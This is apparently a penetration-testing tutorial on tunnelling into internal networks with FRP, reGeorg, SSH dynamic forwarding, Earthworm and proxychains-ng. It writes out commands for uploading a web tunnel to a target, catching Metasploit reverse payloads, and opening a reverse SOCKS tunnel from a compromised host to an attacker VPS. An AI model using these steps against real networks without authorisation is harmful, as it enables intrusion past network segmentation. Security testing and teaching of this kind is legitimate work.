Mastering Internal Network Access: FRP, reGeorg, SSH Tunneling & Proxy Tools

During penetration testing, targets are often located behind internal networks or firewalls, requiring traffic to be proxied into the target LAN. The following methods illustrate how to achieve traffic proxying and port forwarding.

FRP Port Forwarding

FRP is a high‑performance reverse proxy that supports TCP, UDP, HTTP and HTTPS. It can map a local port to a public port, enabling reverse shells to connect back through the public address.

Download the FRP binary package:

wget https://github.com/fatedier/frp/releases/download/v0.32.0/frp_0.32.0_linux_amd64.tar.gz

Extract the archive: tar zxf frp_0.32.0_linux_amd64.tar.gz Enter the directory: cd frp_0.32.0_linux_amd64/ Configure the client (frpc.ini) with server_addr set to the public IP and server_port to the communication port. For example, map port 1234 for a reverse web‑shell.

Configure the server (frps.ini) with the same server_port. Start the services:

./frps -c frps.ini

./frpc -c frpc.ini

After the FRP tunnel is active, use Metasploit to listen on the local port (e.g., 1234) and generate a reverse payload pointing to the public address. The payload will connect back through the FRP tunnel.

reGeorg + Proxifier

reGeorg is an upgraded version of reDuh that forwards internal server ports over HTTP/HTTPS tunnels, creating a SOCKS proxy. It works with ASPX, PHP, or JSP back‑ends. The server component runs on the target web server, while the client (Python) listens locally and forwards traffic through the tunnel.

Typical workflow:

Upload tunnel.nosocket.php to the web root of the target.

Run the client:

python reGeorgSocksProxy.py -p 8888 -u http://192.168.114.129/tunnel.nosocket.php

Configure Proxifier to use the SOCKS5 proxy 192.168.114.129:80 and set rule groups so that only desired applications (e.g., browsers) use the proxy, while python.exe runs in direct mode to avoid loops.

Once configured, internal web services become reachable through the proxy.

SSH Port Forwarding

Common SSH tunnel options:

-C  Enable compression
-f  Run SSH in background
-N  Create a silent connection (no remote command)
-g  Allow remote hosts to connect to local forwarded ports
-L  Local port forwarding
-R  Remote port forwarding
-D  Dynamic (SOCKS) forwarding
-P  Specify SSH server port

Example of remote dynamic forwarding: ssh -CfNg -D 1111 [email protected] -P 44866 This command creates a local SOCKS4/5 proxy on port 1111 that forwards traffic through the remote SSH server to the internal target.

Using ew + SocksCap

Earthworm (ew) is a versatile internal‑network penetration tool with binaries for Windows, Linux, macOS and ARM platforms. It can run as a forward SOCKS5 server or as a reverse SOCKS5 client.

Typical commands:

Forward SOCKS5 server (public IP target): ew.exe -s ssocksd -l 888 Reverse SOCKS5 server (no public IP): ew.exe -s rcsocks -l 1008 -e 888 On the server side, bind the reverse tunnel: ew.exe -s rssocks -d 2.2.2.2 -e 888 Experimental case: a VPS without a public IP runs: ./ew -s rcsocks -l 1260 -e 1261 The attacker uploads ew.exe to the internal machine and runs: ew.exe -s rssocks -d 148.xx.xx.xx -e 1261 The VPS then shows a successful connection, and the attacker can route traffic through SocksCap64 or configure browsers to use the SOCKS5 proxy, gaining access to internal web services.

proxychains‑ng

proxychains‑ng is an upgraded version of proxychains that can route traffic through SOCKS5 proxies. Install it from SourceForge, then configure /etc/proxychains.conf:

vi /etc/proxychains.conf
socks5 148.xx.xx.xx 1260

Test the tunnel; successful output indicates that internal services are reachable. proxychains4 combined with tools like nmap can further enumerate the internal network.

These techniques collectively enable attackers to bypass network segmentation and conduct thorough internal penetration testing.